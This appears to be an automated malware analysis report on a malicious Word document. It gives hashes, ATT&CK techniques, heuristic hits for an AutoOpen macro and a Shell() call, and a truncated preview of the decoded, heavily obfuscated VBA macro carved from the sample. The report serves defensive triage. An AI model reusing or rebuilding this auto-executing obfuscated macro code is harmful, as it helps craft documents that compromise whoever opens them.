Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6636f2e607612a33…

MALICIOUS

Office (OLE)

289.0 KB Created: 2018-02-28 14:49:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 0a0bb5fd6f23776d51eb66bb504039f9 SHA-1: 10ad48d115c158ddec0ec7a8e63076f2eaa945ce SHA-256: 6636f2e607612a337ae6e2ec2e045c87716ae04c2894e5a920777113dad1eb42
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses a Shell() call, indicating an attempt to execute arbitrary code. The obfuscated nature of the script prevents a precise determination of its payload, but it is highly likely designed to download and execute a second-stage payload. The presence of the 'macros.bas' artifact is noted as an IOC.

Heuristics 6

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 94238 bytes
SHA-256: 559055e74ef4b21d34b9bb597fc7e1c1aa9201268885bd0ec5ce6369cd58625b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 31 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wdDAFczsfZSVz"
Sub ikBIHWYMQwK()
   On Error Resume Next
   While VzkQNXhshcMzh < lEwMCHm
      Set NZajREUjNEpKHw = OMvoFA
      YDarkU = 3065290 + Round(wCHZl) - 2159260 * Cos(8079823) / FcXzOHHWIn + Chr(iAHThvHBXIZTAT)
      ImDhMw = ipLhDrRvD / wYhCojaiiJS
   Wend
   Select Case fIXiEwVTa
      Case 5267799
         JSRHzrPkbFqXbl = UDcDhm
         MKCKZm = 3602025
      Case 5114345
         JVYYkXcbmOZ = PplvsziSrWtND
         HEoScR = Rnd(149569)
      Case 4184486
         CDMWzaARSMO = Atn(9425912)
         ROhpoIsmb = Fix(2202440 + 4142236 * 5850665 * XmUmIquI)
   End Select
   For sfbjrqFaAoI = 7375511 To Zlncsduarrsh
      OzjEX = 562848 - hWBOHRB
      Select Case AKjVdjNiwfw
         Case 3168052
            IAniznc = ChrW(twQFZG - CSng(jZVbc))
            ZjKWEUB = hYZmzYV
         Case 2649243
            IdZZHOQPDdJ = ChrB(ZKXoAjTdMvTbtL)
            rTZhhVtMz = 538206
      End Select
      SSuGArrOINCz = Sitn - 9748244
      For CkTNKzfvrZwd = cdfwZlNQBjFuck To 5935044
         JoVbs = (6014713 * 7207792 + znEHXbUKWv * Sin(ldPdMlY - CDbl(BOSiN) * 144092 * hkaCCzrFwljFt) / 5160171 * CLng(2773161 - CDate(YjVtauLJpUfkM)) / FrHftjjTsRt + 4620639 / (rfjiZmTu / sHRmZ - MiSHsSjp / Int(9667180 - Round(jiLEnEz) + 459467 / 5649112)))
      Next
   Next
End Sub
Function TRIDDPYNCn()
On Error Resume Next
Eiiuccii = "BzoIFJWVmMCZKuTrav%!!%3ravLRNzcmaTIzuYn"
HITcA = oBtSLjGH = (6144964 * 9483820 + AEUZjQwkQvKwH * Sin(EIGcickP - CDbl(HJzjJb) * 5355798 * OiZdhTNTaY) / 7635028 * CLng(994807 - CDate(iFmwGbAfB)) / KkwNQjhmJ + 7743216 / (vRhpXosI / DwKkd - MkDzb / Int(9235500 - Round(JPskGzm) + 8581122 / 7449541)))
ktspZj = QCinEIjmHW = (9416192 * 3488292 + aLkLUzj * Sin(MYiISw - CDbl(ivWLQStiuRIb) * 3771446 * UZQrBSY) / 4219746 * CLng(7218954 - CDate(vDUEdzim)) / wELAlBv + 6291813 / (puLVPwszSR / iNMJDQMz - EvmWQWIIZipG / Int(7272359 - Round(jqGZoXMihNUhjr) + 393560 / 9331391)))
jsAhwR = iuivbdfghnkjgyugjn(Eiiuccii, 14, 11)
aLHHilK = "wODpzwJqRJkq!%2raGTwOMBCTpnvMKEDLZtNt"
FDUVpvbu = ZmmCancz = (2401357 * 901495 + kDAnZJZzDQ * Sin(vAjUGzunSTqXw - CDbl(LRjzEPSGWMY) * 6632655 * fKYuNBhqmV) / 1209175 * CLng(6432348 - CDate(EYmHujEHOs)) / zzBYpdUvXUOdt + 4891215 / (VOpYvaRZKu / OSsdVRSf - OAJBJBLJKqvsiR / Int(2057742 - Round(RqzSfZriVPCCu) + 9903821 / 9531768)))
uNIdz = OcOVFoP = (8799575 * 2885466 + PUwbjA * Sin(nDbUMQoIiju - CDbl(IPKskiFCpldbDD) * 4549418 * XftiBU) / 1295311 * CLng(9244722 - CDate(qBMZMaIVu)) / sEbOwa + 9610886 / (BZARJsflzmLwn / OWudtd - LVFJzfEwRw / Int(1597243 - Round(cEWWY) + 8466317 / 3713064)))
VwcRzMVB = iuivbdfghnkjgyugjn(aLHHilK, 21, 5)
WLnKlzXD = "RnCCEJhK% tes&&sFXOonskjpJJwZWzjpmcWDw"
wicno = tdnWBPkJjJC = (9147015 * 2500840 + SIPCiOvkGhHZ * Sin(BJXQatEFQfa - CDbl(rbTlokLbXAWYEG) * 1661413 * IWFOchjALtcB) / 1590404 * CLng(6022952 - CDate(coHqm)) / wSzvwKAmzL + 3773074 / (TwuaMTKsSauH / Tswtjw - WIKEISdX / Int(6731981 - Round(LhIQoiH) + 459162 / 5538855)))
jKrNN = jtKXXpliRBsP = (2912365 * 680637 + KmpStpm * Sin(EOMzti - CDbl(rrGHjc) * 9782366 * hShwGhVwSFBi) / 9249729 * CLng(3397104 - CDate(jztkFIKqsAH)) / BIHTmL + 9872987 / (zMqjci / utrAOaHX - qssiXc / Int(7870496 - Round(wXUnLlPSwJkWJM) + 1641376 / 4507105)))
UNODCZfDXrc = iuivbdfghnkjgyugjn(WLnKlzXD, 23, 8)
qPWsKub = "EhjDzRiqjOGBwzzwXoTiZbOwchns"
LUQLANMB = SzilFEATOwz = (7153482 * 1659174 + qujvzp * Sin(KzsrrNDzvrsp - CDbl(uKjRopTwJDp) * 6869902 * CzXDqiXwIB) / 7332964 * CLng(8770559 - CDate(rzWSGEv)) / OfOPHHVoA + 8889553 / (HPKFZ / BOSnmJtXZzVaq - loDoRIojXBIHHi / Int(7286427 - Round(hswaFqdkcWUrhJ) + 7932 / 2719821)))
YICiPQtOE = zSTLWnQ = (735170 * 3438582 + QfiCLlaPdiPru * Sin(SLvnwBN - CDbl(uwJQS) * 7714849 * EfWnzMF) / 9566051 * CLng(3921203 - CDate(GHtWkv)) / XHsKsd + 1462422 / (
... (truncated)